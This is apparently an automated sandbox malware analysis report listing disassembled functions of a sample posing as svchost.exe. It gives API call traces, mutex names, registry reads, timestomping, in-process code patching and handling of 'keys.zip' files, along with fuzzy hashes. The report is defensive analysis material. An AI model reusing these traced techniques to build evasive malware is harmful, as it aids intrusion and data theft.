Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: AddressCountHandleModuleProcTick$_snprintf
String ID: %x%x$3eaeb407628e78f$RtlUniform$ntdll.dll
API String ID: 3150073801-4107548479
Opcode ID: 7bfdd6ea130dd7d0752e73ad24c98e78e7c8e97a788127f6fdfbb96cbc46ae34
Instruction ID: 5a14658e86638344b8a2ced82f8d04c3c0041d2914e6f8f1cfb963b98a25b670
Opcode Fuzzy Hash: 7bfdd6ea130dd7d0752e73ad24c98e78e7c8e97a788127f6fdfbb96cbc46ae34
Instruction Fuzzy Hash: 2C01C831FC02116FFB049A79BC4DDB6335AAB9A7143448D25EA12E2380EBA8CD25C670

Function 02D3EA80 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D3EA9C
Sleep.KERNEL32(00000064), ref: 02D3EAB2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}), ref: 02D3EAC0
ReleaseMutex.KERNEL32(00000000), ref: 02D3EAC9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D3EAE1
CloseHandle.KERNEL32(00000000), ref: 02D3EAF3
PathAddBackslashA.SHLWAPI(5e8dc1e5), ref: 02D3EAFE
Sleep.KERNEL32(00009C40,5e8dc1e5,CRAIF), ref: 02D3EB18

Strings

Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}, xrefs: 02D3EA90, 02D3EAB4
5e8dc1e5, xrefs: 02D3EAF9, 02D3EB09
CRAIF, xrefs: 02D3EB04

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: 5e8dc1e5$CRAIF$Local\{EAF799BF-8989-4fa1-9A0D-95CD39DC0214}
API String ID: 849374196-2113155645
Opcode ID: 798dcde6366fb78fb56923f242d7e34664e4f258f3f705e974bd65ce0d2f7648
Instruction ID: e94a40f4cd1d393937e57cbcc75f930235ef23bfc0bf36ded8e4883bfc7c279c
Opcode Fuzzy Hash: 798dcde6366fb78fb56923f242d7e34664e4f258f3f705e974bd65ce0d2f7648
Instruction Fuzzy Hash: 4101F932EC83142BF31297A0AC4DF6AB388AF04F54F544505FD45A63C0DBE49C558AB5

Function 02D3C670 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 45sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}), ref: 02D3C69C
ReleaseMutex.KERNEL32(00000000), ref: 02D3C6A9
GetHandleInformation.KERNEL32(00000000,?), ref: 02D3C6BD
CloseHandle.KERNEL32(00000000), ref: 02D3C6CF
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02D3C6DE
PathAddBackslashA.SHLWAPI(5E8DC08D), ref: 02D3C6E5
Sleep.KERNEL32(00009C40,5E8DC08D,BSS), ref: 02D3C6FF
Sleep.KERNEL32(00000064), ref: 02D3C705

Strings

5E8DC08D, xrefs: 02D3C6E0, 02D3C6F0
Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}, xrefs: 02D3C690
BSS, xrefs: 02D3C6EB

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: HandleMutexSleep$BackslashCloseInformationObjectOpenPathReleaseSingleWait
String ID: 5E8DC08D$BSS$Local\{EAF799BF-8989-4fe1-9A0D-95CD39DC2014}
API String ID: 3206501308-1397768872
Opcode ID: fab6c6dd419d1190be567a0c3c50389d74b8c72c905aba9bbda3ef8a325188bd
Instruction ID: ab0bd148da1fe08d5b4ba7fc8eb6a65652f850b53f2e8b2df16521305c9359a1
Opcode Fuzzy Hash: fab6c6dd419d1190be567a0c3c50389d74b8c72c905aba9bbda3ef8a325188bd
Instruction Fuzzy Hash: BE01F730DD8711ABE3126B60EC0DF1A37586B09B64F504605F982B13C0EBF4AC14C779

Function 02D282E0 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 44libraryloadersynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D282FE
GetCurrentProcessId.KERNEL32 ref: 02D28306
_snprintf.MSVCRT ref: 02D2831E
CreateMutexA.KERNEL32(00000000,00000000,?), ref: 02D28332
SetErrorMode.KERNEL32(00000002), ref: 02D2833A
LoadLibraryA.KERNEL32(winmm.dll,waveOutOpen), ref: 02D2834A
GetProcAddress.KERNEL32(00000000), ref: 02D28351
WriteProcessMemory.KERNEL32(000000FF,00000000,?,00000006,00000000), ref: 02D28373

Strings

winmm.dll, xrefs: 02D28345
Global\HighMemoryEvent_%08x, xrefs: 02D2830D
waveOutOpen, xrefs: 02D28340

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Process$AddressCreateCurrentErrorLibraryLoadMemoryModeMutexProcWrite_snprintfmemset
String ID: Global\HighMemoryEvent_%08x$waveOutOpen$winmm.dll
API String ID: 45796355-4231559177
Opcode ID: 10d2d3d803a5fac95b324573bfdc0debb532181bb858d1e8e0268f26a8dded49
Instruction ID: c57cef42545b664187a59fd662ec1a1317ed6f1ea55eab0d32fabbd137923a9c
Opcode Fuzzy Hash: 10d2d3d803a5fac95b324573bfdc0debb532181bb858d1e8e0268f26a8dded49
Instruction Fuzzy Hash: 82012171984204BBE710ABD4AD0EFA97728AB15705F804688F645A52C0D7F55EA48FB1

Function 02D31930 Relevance: 17.9, APIs: 14, Instructions: 355COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 46de6c981ec463d2e5bdf47b3dbb71812d2e32cdf3826812047de354e22c9ce0
Instruction ID: 0d6b704f6b2154140d444fef1ecfce3baeea6ddaecb2e40bddf6c890b8f775c4
Opcode Fuzzy Hash: 46de6c981ec463d2e5bdf47b3dbb71812d2e32cdf3826812047de354e22c9ce0
Instruction Fuzzy Hash: 8EC1C531A046179FCB16CF68C8A4BAEB7B5FF4A354B144254EC999B344D731EE05CBA0

Function 02D27A00 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 136registrymemoryCOMMON

Download Yara Rule

APIs

IsUserAnAdmin.SHELL32 ref: 02D27A0A
memset.MSVCRT ref: 02D27A41
memset.MSVCRT ref: 02D27A59
RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000101,?,?,?,?,?,74DEF380), ref: 02D27A7B
RegQueryValueExA.ADVAPI32(?,00000001,00000000,00000001,?,00000104,?,?,?,?,74DEF380), ref: 02D27AA1
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,74DEF380), ref: 02D27B2D
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,74DEF380), ref: 02D27B34
memset.MSVCRT ref: 02D27B43
RegCloseKey.ADVAPI32(?,?,?,?,?,74DEF380), ref: 02D27B73

Strings

software\microsoft, xrefs: 02D27A6B

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AdminAllocCloseOpenProcessQueryUserValue
String ID: software\microsoft
API String ID: 4189572443-3673152959
Opcode ID: 8c254a3998ae1bb691d7fc409b14856a414a25ed51c58b4dd084c8820842de16
Instruction ID: afefe4af31a9b6944c7f0e7b4aa0dabe30333b71daba9bd3b0339b4c40f72e27
Opcode Fuzzy Hash: 8c254a3998ae1bb691d7fc409b14856a414a25ed51c58b4dd084c8820842de16
Instruction Fuzzy Hash: B0412A71A4015D6BEB24DB74DC98EFEF7A9EB64308F0045A8E545D3340E3708E88CBA0

Function 02D43376 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 134synchronizationsleepfileCOMMON

Download Yara Rule

APIs

PathAddBackslashA.SHLWAPI(02D7CF94), ref: 02D4339D
PathAddBackslashA.SHLWAPI(02D7CF94,?,?), ref: 02D43437
SetFileAttributesA.KERNEL32(?,00000000), ref: 02D434A6
DeleteFileA.KERNEL32(?), ref: 02D434B3
CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF777FF-8989-4fe1-977D-95CD777C0214},?,?), ref: 02D434E7
Sleep.KERNEL32(000003E8), ref: 02D434F8
ReleaseMutex.KERNEL32(00000000), ref: 02D434FF

Strings

keys.zip, xrefs: 02D433E8
keys_path.txt, xrefs: 02D43478
Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}, xrefs: 02D434DE

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: BackslashFileMutexPath$AttributesCreateDeleteReleaseSleep
String ID: Local\{EAF777FF-8989-4fe1-977D-95CD777C0214}$keys.zip$keys_path.txt
API String ID: 1512046866-380397883
Opcode ID: ebbf73bd30c1a33e32579384629c72541e67a2b91a75ed38a249f7ee5a19ba81
Instruction ID: ea8a39e5e4b16e019c5f1ed2206361c1d51c7d52635524b3e6a0cefaa0e76fbd
Opcode Fuzzy Hash: ebbf73bd30c1a33e32579384629c72541e67a2b91a75ed38a249f7ee5a19ba81
Instruction Fuzzy Hash: 4C4119309442594FCB16CB28A8ACBEABBE1EF95300F5485D5D889D7350EF319D49CBE0

Function 02D313B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 123registrymemoryCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D313E3
memset.MSVCRT ref: 02D313FB
RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000101,80000002,?,?,?,?,74DEF550,74DF1620), ref: 02D3141C
RegQueryValueExA.ADVAPI32(80000002,A1633E89a,00000000,00000001,?,00000104,?,?,?,?,74DEF550,74DF1620), ref: 02D31443
GetProcessHeap.KERNEL32(00000008,?,00000000,?,?,?,?,?,?,74DEF550,74DF1620), ref: 02D314CD
HeapAlloc.KERNEL32(00000000,?,?,?,?,74DEF550,74DF1620), ref: 02D314D4
memset.MSVCRT ref: 02D314E3
RegCloseKey.ADVAPI32(80000002,?,?,?,?,74DEF550,74DF1620), ref: 02D31513

Strings

A1633E89a, xrefs: 02D3143D
software\microsoft, xrefs: 02D31410

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: memset$Heap$AllocCloseOpenProcessQueryValue
String ID: A1633E89a$software\microsoft
API String ID: 4158279268-640965002
Opcode ID: 2c0809bf5ff6f7fc5cea1040b254c773abe4b0de2438b45698d0ef349dc11914
Instruction ID: 255e7871cd7372040dd86fe5d8326cf76b26f9fa4d0132f9ac7f680e3d274bbc
Opcode Fuzzy Hash: 2c0809bf5ff6f7fc5cea1040b254c773abe4b0de2438b45698d0ef349dc11914
Instruction Fuzzy Hash: 9641177294015E6BDB25DBB4DC98BEE77B9EF49304F4045A8E549D3240E370CE88CBA0

Function 004019B0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 93processstringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 004019C8
memset.MSVCRT ref: 004019EE
lstrcpynA.KERNEL32(?,?+@,00000104,?,?,?,7604DB30,00000000,00000000), ref: 00401A06
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,7604DB30,00000000,00000000), ref: 00401A29
GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A4A
CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A57
GetHandleInformation.KERNEL32(?,?+@,?,?,?,7604DB30,00000000,00000000), ref: 00401A6E
CloseHandle.KERNEL32(?,?,?,?,7604DB30,00000000,00000000), ref: 00401A7B

Strings

D, xrefs: 00401A22
?+@, xrefs: 004019F3, 00401A69, 00401A45, 004019FE, 00401A48, 00401A6C

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Handle$CloseInformationmemset$CreateProcesslstrcpyn
String ID: ?+@$D
API String ID: 2248944234-1654856090
Opcode ID: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction ID: b4650b333af88615931ce45c43086d11ba0b8feb79f29fc85485a8f74bed1c81
Opcode Fuzzy Hash: 63e8d1617f7b3eb59dfa7381756486b10c89a04084b545fc1668d5111b84a648
Instruction Fuzzy Hash: C82153B2A002096FDB10DFE4DC84AEF7BBCAB54354F00417AEA05F6251D6749A45CBA4

Function 00401EA0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 76filetimeCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(\\?\globalroot\systemroot\system32\drivers\ntfs.sys,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EC5
GetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?,?,?), ref: 00401EDF
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401EF5
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F06
CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000003,00000080,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F22
SetFileTime.KERNEL32(00000000,?,?,*@,?,?,?,?,?,00402AE7,?), ref: 00401F38
GetHandleInformation.KERNEL32(00000000,00000000,?,?,?,?,?,00402AE7,?), ref: 00401F4E
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00402AE7,?), ref: 00401F5F

Strings

*@, xrefs: 00401ED2, 00401F2B, 00401ED5, 00401F2E
\\?\globalroot\systemroot\system32\drivers\ntfs.sys, xrefs: 00401EC0

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: FileHandle$CloseCreateInformationTime
String ID: \\?\globalroot\systemroot\system32\drivers\ntfs.sys$*@
API String ID: 1046229350-2079472752
Opcode ID: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction ID: 505fd7f37fca788128ae4fd827e8faf93d8922700b858b40f06f957d70fc4d32
Opcode Fuzzy Hash: debd997a1ae25e968ba5f195e8076c6c73cac294b2f06de3a557e421d3efc3a2
Instruction Fuzzy Hash: FA21967250021876D7219B64DC49FEFBB6CAF98750F144225FF01B61E0D7B45A4586E8

Function 02D32260 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 75memorystringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 02D32277
SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?,?,74DEF550,00000000), ref: 02D3228E
PathAddBackslashA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D3229B
PathFileExistsA.SHLWAPI(?,?,74DEF550,00000000), ref: 02D322D7
lstrcpynA.KERNEL32(02D79F08,00000000,00000104,00000000,00000001,?,74DEF550,00000000), ref: 02D32301
GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32310
HeapValidate.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32313
GetProcessHeap.KERNEL32(00000000,00000000,?,74DEF550,00000000), ref: 02D32320
HeapFree.KERNEL32(00000000,?,74DEF550,00000000), ref: 02D32323

Strings

a1633ec9a, xrefs: 02D322A1

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$Path$Process$BackslashExistsFileFolderFreeValidatelstrcpynmemset
String ID: a1633ec9a
API String ID: 780088666-972184491
Opcode ID: ebe72e13dcde2d0e3c106da71e5585774172313dd9f62e84daeadf7c8c78871d
Instruction ID: 7967c179fee58a6c5a0a29321f717e7d086c295fe113d91ce51cf66d5923fcb7
Opcode Fuzzy Hash: ebe72e13dcde2d0e3c106da71e5585774172313dd9f62e84daeadf7c8c78871d
Instruction Fuzzy Hash: 1111E431A8021567D7215628AC1DFEB7B69EB41B01F840544F9C5EB3C0DEE19CD4CAE0

Function 02D44FD0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 68memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 02D27220: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000,?,a1633ec9a,76EEC3F0,?,?,02D322F0,00000000,00000001), ref: 02D27246
Part of subcall function 02D27220: GetFileSizeEx.KERNEL32(00000000,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27264
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000008,?,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D2728D
Part of subcall function 02D27220: RtlAllocateHeap.NTDLL(00000000,?,?,02D322F0,00000000,00000001,?,74DEF550,00000000), ref: 02D27294
Part of subcall function 02D27220: memset.MSVCRT ref: 02D272A7
Part of subcall function 02D27220: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02D272D3
Part of subcall function 02D27220: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D272E3
Part of subcall function 02D27220: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02D272F2
Part of subcall function 02D27220: UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02D27305
Part of subcall function 02D27220: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02D27314
Part of subcall function 02D27220: HeapValidate.KERNEL32(00000000), ref: 02D2731B

RtlImageNtHeader.NTDLL(00000000), ref: 02D44FFE
GetTickCount.KERNEL32 ref: 02D45012
GetModuleHandleA.KERNEL32(ntdll.dll,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45023
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 02D45033
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45070
HeapValidate.KERNEL32(00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45073
GetProcessHeap.KERNEL32(00000000,00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45080
HeapFree.KERNEL32(00000000,?,?,02D351DB,C:\Windows\apppatch\svchost.exe), ref: 02D45083

Strings

ntdll.dll, xrefs: 02D4501E
RtlUniform, xrefs: 02D4502D

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$Validate$AddressAllocateCountCreateFreeHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 1866686876-3277137149
Opcode ID: 8d9cec74560aaed6cf68f81706b8c612e08307d3858d3a9c58ab2d10b8dedc1a
Instruction ID: 421071945fa3c4d5c570cbdc92ae29154e9fb33a48caca38b556be8a650c930e
Opcode Fuzzy Hash: 8d9cec74560aaed6cf68f81706b8c612e08307d3858d3a9c58ab2d10b8dedc1a
Instruction Fuzzy Hash: 31118E35A802006BE7209B75BC4CF9B7BA9EF99714F944914FA09D2340DB34DD60CAF0

Function 00401DE0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 66memorylibraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 004013C0: CreateFileA.KERNEL32(00402A87,80000000,00000003,00000000,00000003,00000080,00000000,7604DB30,?,00000000,?,?,?,00401E04,00000000,7604DB30), ref: 004013E7
Part of subcall function 004013C0: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401403
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000008,?,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 00401423
Part of subcall function 004013C0: HeapAlloc.KERNEL32(00000000,?,?,?,00401E04,00000000,7604DB30,?,00000000,00402A87), ref: 0040142A
Part of subcall function 004013C0: memset.MSVCRT ref: 0040143D
Part of subcall function 004013C0: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00401E04), ref: 0040145A
Part of subcall function 004013C0: LockFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00401E04), ref: 0040146A
Part of subcall function 004013C0: ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,?,?,00401E04), ref: 00401479
Part of subcall function 004013C0: UnlockFile.KERNEL32(00000000,00401E04,00000000,?,00000000,?,?,?,00401E04), ref: 0040148C
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014A1
Part of subcall function 004013C0: HeapValidate.KERNEL32(00000000), ref: 004014A4
Part of subcall function 004013C0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 004014B1
Part of subcall function 004013C0: HeapFree.KERNEL32(00000000), ref: 004014B4

RtlImageNtHeader.NTDLL(00000000), ref: 00401E0F
GetTickCount.KERNEL32 ref: 00401E23
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 00401E34
GetProcAddress.KERNEL32(00000000,RtlUniform), ref: 00401E44
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E7E
HeapValidate.KERNEL32(00000000), ref: 00401E81
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401E8E
HeapFree.KERNEL32(00000000), ref: 00401E91

Strings

ntdll.dll, xrefs: 00401E2F
RtlUniform, xrefs: 00401E3E

Memory Dump Source

Source File: 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2909940532.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_svchost.jbxd

Yara matches

Similarity

API ID: Heap$File$Process$FreeValidate$AddressAllocCountCreateHandleHeaderImageLockModulePointerProcReadSizeTickUnlockmemset
String ID: RtlUniform$ntdll.dll
API String ID: 1392322707-3277137149
Opcode ID: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
Instruction ID: 1ecd765bda1492a879e644bd2742a44ced4fa461e9381bf643e5a49b1714824c
Opcode Fuzzy Hash: 1f31fb01e377a77380818de384341757870d4e22472757c70309413c113d3583
Instruction Fuzzy Hash: 40112171601314EBD710ABB6ED49B9B7A989F85751B104135FB09F32E1DA38CD04CAA8

Function 02D443A0 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D443BC
Sleep.KERNEL32(00000064), ref: 02D443D2
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}), ref: 02D443E0
ReleaseMutex.KERNEL32(00000000), ref: 02D443E9
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44401
CloseHandle.KERNEL32(00000000), ref: 02D44413
PathAddBackslashA.SHLWAPI(02D7D2A0), ref: 02D4441E
Sleep.KERNEL32(00009C40,02D7D2A0,YOTA), ref: 02D44438

Strings

Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}, xrefs: 02D443B0, 02D443D4
YOTA, xrefs: 02D44424

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

API ID: Mutex$HandleOpenSleep$BackslashCloseInformationPathRelease
String ID: Local\{EAF799BF-89ea-4fe1-9A0D-95CD39DC0214}$YOTA
API String ID: 849374196-4127202605
Opcode ID: 784422536a3f2386d595f2491aeb550312af17008cfc9bbd7e9e5e35d542f5ee
Instruction ID: 1a7e2f66587e01701ddbe6ca605a892f6f78b9ab0d72d066a0b4a9019eefa92f
Opcode Fuzzy Hash: 784422536a3f2386d595f2491aeb550312af17008cfc9bbd7e9e5e35d542f5ee
Instruction Fuzzy Hash: C4012632AC03102BE211A7A07C4DF6A73989F44B18F944515FD85A2380DFF4EC5486B5

Function 02D44030 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 56sleepsynchronizationCOMMON

Download Yara Rule

APIs

OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D4404C
Sleep.KERNEL32(00000064), ref: 02D44062
OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}), ref: 02D44070
ReleaseMutex.KERNEL32(00000000), ref: 02D44079
GetHandleInformation.KERNEL32(00000000,00000000), ref: 02D44091
CloseHandle.KERNEL32(00000000), ref: 02D440A3
PathAddBackslashA.SHLWAPI(02D7D19C), ref: 02D440AE
Sleep.KERNEL32(00009C40,02D7D19C,VEFK), ref: 02D440C8

Strings

VEFK, xrefs: 02D440B4
Local\{EAF7722F-8989-4fe1-977D-95CD777C0214}, xrefs: 02D44040, 02D44064

Memory Dump Source

Source File: 00000001.00000002.2912354659.0000000002D20000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D20000, based on PE: true

Associated: 00000001.00000002.2912354659.0000000002D79000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2912354659.0000000002D7E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2d20000_svchost.jbxd

Yara matches

Similarity

